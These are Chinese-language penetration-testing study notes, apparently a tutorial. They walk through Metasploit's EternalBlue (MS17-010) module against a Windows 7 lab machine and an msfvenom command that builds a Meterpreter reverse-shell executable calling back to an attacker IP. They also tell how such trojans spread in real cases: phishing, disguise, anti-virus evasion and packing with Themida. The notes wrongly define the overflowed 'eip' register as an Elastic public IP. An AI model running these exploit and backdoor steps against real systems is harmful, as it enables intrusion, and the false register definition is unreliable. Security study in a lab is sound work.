目录

黑客法则：

一：页面使用基础

二：msf和Windows永恒之蓝漏洞

kali最强渗透工具——metasploit

介绍

使用永恒之蓝进行攻击

​编辑 使用kali渗透工具生成远程控制木马

渗透测试——信息收集

域名信息收集

---

黑客法则：

一：页面使用基础

1.kali十三大使用工具

2.打开终端

3.设置

二：msf和Windows永恒之蓝漏洞

kali最强渗透工具——metasploit

介绍

定义：

msf是一款开源安全漏洞利用和测试工具，集成了各种平台上常见的溢出漏洞和流行的shellcode，并持续保持更新。

shellcode是一段用于利用软件漏洞而执行的代码，shellcode为16进制的机器码，因为经常让攻击者获得shell而得名。 shellcode常常使用机器语言编写。 可在暂存器eip溢出后，塞入一段可让CPU执行的shellcode机器码，让电脑可以执行攻击者的任意指令。

eip定义：

弹性公网IP (Elastic IP,简称EIP)提供独立的公网IP资源，包括公网IP地址与公网出口带宽服务。为资源配置弹性公网IP后，可以直接访问Internet，如果资源只配置了私网IP就无法直接访Internet。
快捷键：

ctrl加shift加+;ctrl加- 调整字符大小

使用永恒之蓝进行攻击

命令行调整用户：

sudo su
sudo 用户名 

打开msf: 

msfconsole

msfconsole:console(管理口） 

msf搜索模块：

search  ms17_010

 使用模块：

use 0
use exploit/windows/smb/ms17_010_eternalblue

查看当前模块的设置 

show options
options

测试win7和kali虚拟机的连通性

kali虚拟机IP地址

ip a

win7虚拟机IP地址

ipconfig

 可以相互ping通

kali ping win7

win7 ping kali

设置IP地址为目标

set RHOSTS 172.16.100.220

源监听地址 

tcp的逻辑端口：LPORT(0-65535)只要不被占用，可以随意修改 

 运行程序

 使用kali渗透工具生成远程控制木马

帮助命令

help

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.100.129 lport=60000 -f exe -o demo60000.exe

background

真实情况下，木马如何传播呢？ 

一：采用网站的漏洞，进行二次上传

二：通过伪装、免杀、绑定进行钓鱼

免杀 

加壳：themida

渗透测试——信息收集

定义：

信息收集是指通过各种方式获取所需要的信息，以便我们在后续的渗透过程更好的进行。比如目标站点IP、中间件、脚本语言、端口、邮箱等等。信息收集包含资产收集但不限于资产收集。
意义：

●信息收集是渗透测试成功的保障
●更多的暴露面
●更大的可能性

分类：

●主动信息收集
通过直接访问网站在网站上进行操作、对网站进行扫描等，这种是有网络流量经过目标服务器的信息收集方式。
●被动信息收集
基于公开的渠道，比如搜索引擎等，在不与目标系统直接交互的情况下获取信息，并且尽量避免留下痕迹。
内容：

●服务器信息(端口、服务、真实IP)
●网站信息(网站架构(操作系统、中间件、数据库、编程语言)、指纹信息、WAF、敏感目录、敏感文件、源码泄露、旁站查询、C段查询)
●域名信息(whois、 备案信息、子域名)
●人员信息(姓名、职务、生日、联系电话、邮件地址)
 

域名信息收集

域名(Domain Name)，简称域名、网域，是由- -串用点分隔的名字组成的Internet.上某一 台计算机或计算机组的名称，用于在数据传输时标识计算机的电子方位(有时也指地理位置)
DNS (域名系统，Domain Name System)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库，能够使人更方便地访问互联网。